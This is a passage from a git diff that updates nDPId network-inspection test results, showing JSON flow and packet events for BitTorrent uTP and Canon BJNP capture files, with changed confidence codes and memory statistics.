00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1456385034843} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1456385034843,"flow_last_seen":1456385034843,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1456385034843,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1456385034843,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1456385034843,"pkt":"xCwDBkn+LFbcjDU0CABFCACEN6IAAHARjPNS83ErwKgBBf3Jn\/8AcJbNZDE6YWQyOmlkMjA69\/YAfOoTUG5RTefsvJTyrlFxFfg5OmluZm9faGFzaDIwOvf2AdimJ292LCw98nSvKCf40fHeZTE6cTk6Z2V0X3BlZXJzMTp0MjoOYTE6djQ6TFQBATE6eTE6cWU="} -00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1456385034843,"flow_last_seen":1456385034843,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1456385034843,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} +00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1456385034843,"flow_last_seen":1456385034843,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1456385034843,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1456385039236,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1456385039236,"pkt":"xCwDBkn+LFbcjDU0CABFCACEPR1AAHARR3hS83ErwKgBBf3Jn\/8AcOi+ZDE6YWQyOmlkMjA69\/YAfOoTUG5RTefsvJTyrlFxFfg5OmluZm9faGFzaDIwOvf2AbAuK1Rd0f1URppB\/xHRD5bKZTE6cTk6Z2V0X3BlZXJzMTp0MjoZ4TE6djQ6TFQBATE6eTE6cWU="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1456385040274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1456385040274,"pkt":"xCwDBkn+LFbcjDU0CABFCAAwPfxAAHARRu1S83ErwKgBBf3Jn\/8AHJxJQQBTAhDusvAAAAAAAAAAAOf1AAA="} -00834{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1456385034843,"flow_last_seen":1456385041276,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":15014,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1456385041276,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} -00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1456385034843,"flow_last_seen":1456385054059,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":37877,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":1456385054059,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","packets-captured":86,"packets-processed":86,"total-skipped-flows":0,"total-l4-payload-len":37877,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1456385054059} +00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1456385034843,"flow_last_seen":1456385054059,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":37877,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":1456385054059,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","packets-captured":86,"packets-processed":86,"total-skipped-flows":0,"total-l4-payload-len":37877,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1456385054059} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 86/86 ~~ skipped flows.............: 0 @@ -16,10 +15,10 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6134097 bytes -~~ total memory freed........: 6134097 bytes -~~ total allocations/frees...: 118202/118202 +~~ total memory allocated....: 6267731 bytes +~~ total memory freed........: 6267731 bytes +~~ total allocations/frees...: 120964/120964 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 844 chars -~~ json string avg len.......: 653 chars +~~ json string avg len.......: 649 chars diff --git a/test/results/bjnp.pcap.out b/test/results/bjnp.pcap.out index 515b98b42..0f3a93da0 100644 --- a/test/results/bjnp.pcap.out +++ b/test/results/bjnp.pcap.out @@ -2,44 +2,44 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1467725378685} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467725378685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725378685,"pkt":"RQAALAmDAAB5EfxOwKi5jcCoARHDpyGkABg0Q0JKTlACAQAAF6QAAAAAAADK6w=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1467725383705,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383705,"pkt":"RQAALAmRAAB5EfxQwKi5jcCoAQHDqSGkABg0T0JKTlACAQAAF6YAAAAAAACF3A=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1467725383909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383909,"pkt":"RQAALAmSAAB5EfxOwKi5jcCoAQLDqSGkABg0TUJKTlACAQAAF6cAAAAAAAAfDQ=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1467725384113,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384113,"pkt":"RQAALAmTAAB5EfxMwKi5jcCoAQPDqSGkABg0S0JKTlACAQAAF6gAAAAAAACCRA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1467725384313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384313,"pkt":"RQAALAmVAAB5EfxJwKi5jcCoAQTDqSGkABg0SUJKTlACAQAAF6kAAAAAAADs+w=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1467725384517,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384517,"pkt":"RQAALAmWAAB5EfxHwKi5jcCoAQXDqSGkABg0R0JKTlACAQAAF6oAAAAAAADhdg=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1467725384721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384721,"pkt":"RQAALAmXAAB5EfxFwKi5jcCoAQbDqSGkABg0RUJKTlACAQAAF6sAAAAAAACzRQ=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1467725384921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384921,"pkt":"RQAALAmYAAB5EfxDwKi5jcCoAQfDqSGkABg0Q0JKTlACAQAAF6wAAAAAAAC5aQ=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 